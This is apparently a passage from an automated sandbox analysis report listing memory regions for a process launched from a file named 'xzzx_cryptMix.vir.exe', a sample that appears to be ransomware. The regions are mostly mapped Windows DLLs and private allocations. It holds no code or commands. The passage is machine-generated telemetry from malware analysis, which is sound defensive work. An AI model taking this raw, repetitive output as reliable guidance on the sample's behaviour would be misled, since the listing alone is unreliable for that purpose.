00000000:0000e620" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1900 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1901 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1902 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1903 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1904 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1905 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1906 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1907 start_va = 0x55820000 end_va = 0x5585bfff entry_point = 0x55820000 region_type = mapped_file name = "xzzx_cryptmix.vir.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe") Region: id = 1908 start_va = 0x76cc0000 end_va = 0x76e68fff entry_point = 0x76cc0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1909 start_va = 0x76ea0000 end_va = 0x7701ffff entry_point = 0x76ea0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1910 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1911 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1912 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1913 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1914 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1915 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1916 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2081 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2082 start_va = 0x73410000 end_va = 0x73417fff entry_point = 0x734120f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2083 start_va = 0x73420000 end_va = 0x7347bfff entry_point = 0x7345f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2084 start_va = 0x73480000 end_va = 0x734befff entry_point = 0x734ade78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2085 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2086 start_va = 0x74c40000 end_va = 0x74c85fff entry_point = 0x74c47478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2087 start_va = 0x75ce0000 end_va = 0x75deffff entry_point = 0x75cf32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2088 start_va = 0x76aa0000 end_va = 0x76bbefff entry_point = 0x0 region_type = private name = "private_0x0000000076aa0000" filename = "" Region: id = 2089 start_va = 0x76bc0000 end_va = 0x76cb9fff entry_point = 0x0 region_type = private name = "private_0x0000000076bc0000" filename = "" Region: id = 2094 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2095 start_va = 0x3f0000 end_va = 0x456fff entry_point = 0x3f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2096 start_va = 0x729a0000 end_va = 0x729a7fff entry_point = 0x729a0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2097 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b0000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 2098 start_va = 0x729f0000 end_va = 0x72a73fff entry_point = 0x729f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2099 start_va = 0x749f0000 end_va = 0x749fbfff entry_point = 0x749f0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2100 start_va = 0x74a00000 end_va = 0x74a5ffff entry_point = 0x74a00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2101 start_va = 0x74a60000 end_va = 0x74abffff entry_point = 0x74a60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2102 start_va = 0x74ad0000 end_va = 0x74b5efff entry_point = 0x74ad0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2103 start_va = 0x74b90000 end_va = 0x74c0afff entry_point = 0x74b90000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2104 start_va = 0x74c10000 end_va = 0x74c36fff entry_point = 0x74c10000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2105 start_va = 0x74c90000 end_va = 0x74ca1fff entry_point = 0x74c90000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2106 start_va = 0x74cb0000 end_va = 0x758f9fff entry_point = 0x74cb0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2107 start_va = 0x75960000 end_va = 0x759fffff entry_point = 0x75960000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2108 start_va = 0x75c50000 end_va = 0x75cdffff entry_point = 0x75c50000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2109 start_va = 0x75df0000 end_va = 0x75e46fff entry_point = 0x75df0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2110 start_va = 0x75e50000 end_va = 0x75eecfff entry_point = 0x75e50000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2111 start_va = 0x76280000 end_va = 0x7632bfff entry_point = 0x76280000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2112 start_va = 0x76330000 end_va = 0x76348fff entry_point = 0x76330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2113 start_va = 0x76350000 end_va = 0x764abfff entry_point = 0x76350000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2114 start_va = 0x764b0000 end_va = 0x765affff entry_point = 0x764b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2115 start_va = 0x766f0000 end_va = 0x767bbfff entry_point = 0x766f0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2116 start_va = 0x767c0000 end_va = 0x767c9fff entry_point = 0x767c0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2117 start_va = 0x767d0000 end_va = 0x768bffff entry_point = 0x767d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2118 start_va = 0x768c0000 end_va = 0x76a5cfff entry_point = 0x768c0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2119 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2120 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2214 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2215 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2216 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2217 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2218 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2219 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2220 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2221 start_va = 0x4d0000 end_va = 0x657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2222 start_va = 0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 2223 start_va = 0x7f0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2224 start_va = 0x1bf0000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 2225 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 2226 start_va = 0x1df0000 end_va = 0x21e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 2227 start_va = 0x731b0000 end_va = 0x731c5fff entry_point = 0x731b2dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2228 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2229 start_va = 0x731a0000 end_va = 0x731a7fff entry_point = 0x731a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2230 start_va = 0x731f0000 end_va = 0x7326ffff entry_point = 0x732037c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2231 start_va = 0x1c70000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2251 start_va = 0x1c70000 end_va = 0x1d4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 2252 start_va = 0x1d60000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2253 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2254 start_va = 0x23c0000 end_va = 0x2487fff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 2255 start_va = 0x2490000 end_va = 0x275efff entry_point = 0x2490000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2256 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2257 start_va = 0x73270000 end_va = 0x7340dfff entry_point = 0x7329e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2258 start_va = 0x200000 end_va = 0x200fff entry_point = 0x200000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2259 start_va = 0x290000 end_va = 0x291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2260 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 2261 start_va = 0x75a90000 end_va = 0x75b12fff entry_point = 0x75a90000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2268 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2284 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2285 start_va = 0x21f0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2286 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2300 start_va = 0x22f0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 2301 start_va = 0x2760000 end_va = 0x285ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 2302 start_va = 0x749c0000 end_va = 0x749d5fff entry_point = 0x749c2dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2303 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2304 start_va = 0x2330000 end_va = 0x236bfff entry_point = 0x233128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2305 start_va = 0x2330000 end_va = 0x236bfff entry_point = 0x233128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2306 start_va = 0x2330000 end_va = 0x236bfff entry_point = 0x233128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2307 start_va = 0x2330000 end_va = 0x236bfff entry_point = 0x233128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2308 start_va = 0x2330000 end_va = 0x236bfff entry_point = 0x233128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2309 start_va = 0x74980000 end_va = 0x749bafff entry_point = 0x7498128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2310 start_va = 0x74970000 end_va = 0x7497dfff entry_point = 0x74971235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2312 start_va = 0x2330000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 2313 start_va = 0x2370000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 2314 start_va = 0x2860000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 2315 start_va = 0x2960000 end_va = 0x2a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 2316 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2317 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2318 start_va = 0x2a60000 end_va = 0x2b1ffff entry_point = 0x2a60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2333 start_va = 0x74870000 end_va = 0x74964fff entry_point = 0x74870000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2334 start_va = 0x74840000 end_va = 0x74860fff entry_point = 0x74840000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2335 start_va = 0x76030000 end_va = 0x76074fff entry_point = 0x76030000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2336 start_va = 0x2b0000 end_va = 0x2b3fff entry_point = 0x2b0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2337 start_va = 0x2d0000 end_va = 0x2edfff entry_point = 0x2d0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db") Region: id = 2338 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2346 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 2347 start_va = 0x2b20000 end_va = 0x2b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 2348 start_va = 0x2b60000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 2349 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2362 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2363 start_va = 0x1d50000 end_va = 0x1d50fff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 2364 start_va = 0x1da0000 end_va = 0x1da0fff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 2365 start_va = 0x23b0000 end_va = 0x23b0fff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 2428 start_va = 0x2c60000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 2429 start_va = 0x2d60000 end_va = 0x2d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2430 start_va = 0x2da0000 end_va = 0x2e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 2431 start_va = 0x2ea0000 end_va = 0x2f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2432 start_va = 0x2fa0000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 2433 start_va = 0x2fe0000 end_va = 0x30dffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 2434 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 2435 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 2436 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2437 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2438 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 2439 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 2440 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 2441 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 2442 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 2443 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 2444 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2445 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2446 start_va = 0x31a0000 end_va = 0x31a0fff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2447 start_va = 0x31b0000 end_va = 0x31b0fff entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2448 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2449 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 2450 start_va = 0x31e0000 end_va = 0x31e0fff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 2451 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 2452 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2453 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 2454 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 2455 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2456 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 2457 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 2458 start_va = 0x3260000 end_va = 0x3260fff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 2459 start_va = 0x3270000 end_va = 0x3270fff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 2460 start_va = 0x3280000 end_va = 0x3280fff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2461 start_va = 0x3290000 end_va = 0x3290fff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2462 start_va = 0x32a0000 end_va = 0x32a0fff entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 2463 start_va = 0x32b0000 end_va = 0x32b0fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 2464 start_va = 0x32c0000 end_va = 0x32c0fff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2465 start_va = 0x32d0000 end_va = 0x32d0fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 2466 start_va = 0x32e0000 end_va = 0x32e0fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2467 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2468 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2469 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2470 start_va = 0x3320000 end_va = 0x3320fff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2471 start_va = 0x3330000 end_va = 0x3330fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 2472 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 2473 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2474 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 2475 start_va = 0x3370000 end_va = 0x3370fff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 2476 start_va = 0x3380000 end_va = 0x3380fff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 2477 start_va = 0x3390000 end_va = 0x3390fff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 2478 start_va = 0x33a0000 end_va = 0x33a0fff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2479 start_va = 0x33b0000 end_va = 0x33b0fff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" 